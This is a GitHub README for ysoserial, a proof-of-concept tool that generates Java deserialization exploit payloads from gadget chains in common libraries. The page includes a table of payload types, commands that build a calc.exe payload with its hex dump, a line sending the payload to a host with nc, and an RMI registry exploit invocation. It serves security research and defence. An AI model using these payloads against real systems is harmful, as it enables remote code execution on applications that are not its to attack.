- Notifications
You must be signed in to change notification settings - Fork1.9k
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
License
frohoff/ysoserial
Folders and files
| Name | Name | Last commit message | Last commit date | |
|---|---|---|---|---|
Repository files navigation
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Originally released as part of AppSecCali 2015 Talk"Marshalling Pickles: how deserializing objects will ruin your day"with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x).Later updated to include additional gadget chains forJRE <= 1.7u21 and several other libraries.
ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common javalibraries that can, under the right conditions, exploit Java applications performingunsafe deserialization ofobjects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, thenserializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializesthis data, the chain will automatically be invoked and cause the command to be executed on the application host.
It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in havinggadgets on the classpath.
This software has been created purely for the purposes of academic research andfor the development of effective defensive techniques, and is not intended to beused to attack systems except where explicitly authorized. Project maintainersare not responsible or liable for misuse of the software. Use responsibly.
$ java -jar ysoserial.jarY SO SERIAL?Usage: java -jar ysoserial.jar [payload]'[command]' Available payload types: Payload Authors Dependencies ------- ------- ------------ AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 Clojure @JackOfMostTrades clojure:1.8.0 CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 CommonsCollections1 @frohoff commons-collections:3.1 CommonsCollections2 @frohoff commons-collections4:4.0 CommonsCollections3 @frohoff commons-collections:3.1 CommonsCollections4 @frohoff commons-collections4:4.0 CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 CommonsCollections6 @matthias_kaiser commons-collections:3.1 CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 Groovy1 @frohoff groovy:2.3.9 Hibernate1 @mbechler Hibernate2 @mbechler JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 JRMPClient @mbechler JRMPListener @mbechler JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 Jdk7u21 @frohoff Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 MozillaRhino1 @matthias_kaiser js:1.7R2 MozillaRhino2 @_tint0 js:1.7R2 Myfaces1 @mbechler Myfaces2 @mbechler ROME @mbechler rome:1.0 Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 URLDNS @gebl Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
$ java -jar ysoserial.jar CommonsCollections1 calc.exe| xxd0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat...0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........0000570: 0078 7071 007e 003a .xpq.~.:$ java -jar ysoserial.jar Groovy1 calc.exe> groovypayload.bin$ nc 10.10.10.10 1099< groovypayload.bin$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
Download thelatest release jar from GitHub releases.
Requires Java 1.7+ and Maven 3.x+
mvn clean package -DskipTests
- Fork it
- Create your feature branch (
git checkout -b my-new-feature) - Commit your changes (
git commit -am 'Add some feature') - Push to the branch (
git push origin my-new-feature) - Create new Pull Request
- Java-Deserialization-Cheat-Sheet: info on vulnerabilities, tools, blogs/write-ups, etc.
- marshalsec: similar project for various Java deserialization formats/libraries
- ysoserial.net: similar project for .NET deserialization
About
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Topics
Resources
License
Uh oh!
There was an error while loading.Please reload this page.
Stars
Watchers
Forks
Packages0
Uh oh!
There was an error while loading.Please reload this page.